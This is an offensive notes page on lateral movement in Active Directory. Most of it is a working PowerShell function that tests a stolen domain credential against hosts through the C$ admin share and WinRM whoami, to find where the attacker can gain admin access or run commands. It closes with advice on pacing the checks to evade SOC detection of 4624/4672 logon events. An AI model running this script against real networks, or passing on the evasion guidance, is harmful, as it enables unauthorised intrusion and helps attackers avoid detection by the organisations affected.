Lateral Movement
Understanding Lateral Movement in AD
Core Concept
Purpose: Move from one compromised system to another within an Active Directory environment to escalate privileges, access sensitive data, or reach target objectives.
Attack Flow:
Initial Compromise → Credential Extraction → Authentication to New Systems → Repeat Process
Extract credentials from the compromised system
Use stolen authentication material to access other systems
Establish persistence and extract more credentials
Continue until objective is achieved
Requirements: Initial system compromise, extracted authentication material, network access to targets
Attack Value: Domain-wide access, privilege escalation, persistent access to sensitive systems
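The "Authentication to New Systems" step of the flow above, as an added PowerShell example that is not code from the original page: given a credential that has already been extracted, it tries each candidate host over SMB (mapping the C$ admin share, which only members of the local Administrators group can open) and over WinRM (running whoami remotely), and reports which hosts the stolen identity can actually reach. The function name Test-LateralAccess, the hostnames FILE01, WEB01 and DC01, and the interactive Get-Credential prompt are placeholders for a lab; the AD module enumeration in the comment assumes RSAT is installed.

```powershell
# Added example (not from the original page): test extracted credentials
# against candidate hosts to find where the stolen identity has admin access.
function Test-LateralAccess {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,
        [Parameter(Mandatory)][pscredential]$Credential
    )

    foreach ($target in $ComputerName) {
        $result = [ordered]@{
            Target     = $target
            AdminShare = $false   # C$ reachable over SMB with these creds
            WinRM      = $false   # remote code execution over WinRM
            RemoteUser = $null    # identity the remote host sees
        }

        # SMB check: C$ is only readable by local Administrators, so a successful
        # map means the account holds admin rights on the target.
        try {
            $drive = New-PSDrive -Name 'LatMove' -PSProvider FileSystem `
                -Root "\\$target\C$" -Credential $Credential -ErrorAction Stop
            $result.AdminShare = $true
            Remove-PSDrive -Name $drive.Name -Force
        } catch {
            # access denied, host unreachable, or SMB blocked: leave $false
        }

        # WinRM check (TCP 5985/5986): a successful Invoke-Command confirms the
        # account can execute commands remotely, i.e. a real foothold.
        try {
            $who = Invoke-Command -ComputerName $target -Credential $Credential `
                -ScriptBlock { whoami } -ErrorAction Stop
            $result.WinRM      = $true
            $result.RemoteUser = $who
        } catch {
            # WinRM not listening, not admin, or network filtered: leave $false
        }

        [pscustomobject]$result
    }
}

# Constructed usage for a lab. Hostnames and account are placeholders.
# With RSAT present, a target list could come from AD instead, e.g.
#   (Get-ADComputer -Filter 'OperatingSystem -like "*Server*"').Name
$cred = Get-Credential -Message 'Extracted domain account (DOMAIN\user)'
Test-LateralAccess -ComputerName 'FILE01', 'WEB01', 'DC01' -Credential $cred |
    Format-Table -AutoSize
```

Every successful attempt is a network logon on the target: Security event 4624 (logon type 3), and 4672 as well when the account lands with administrative privileges. One account touching many hosts in a short window is exactly the pattern a SOC hunts for, so a real operator spaces these checks out and stays on hosts that matter rather than sweeping the whole domain.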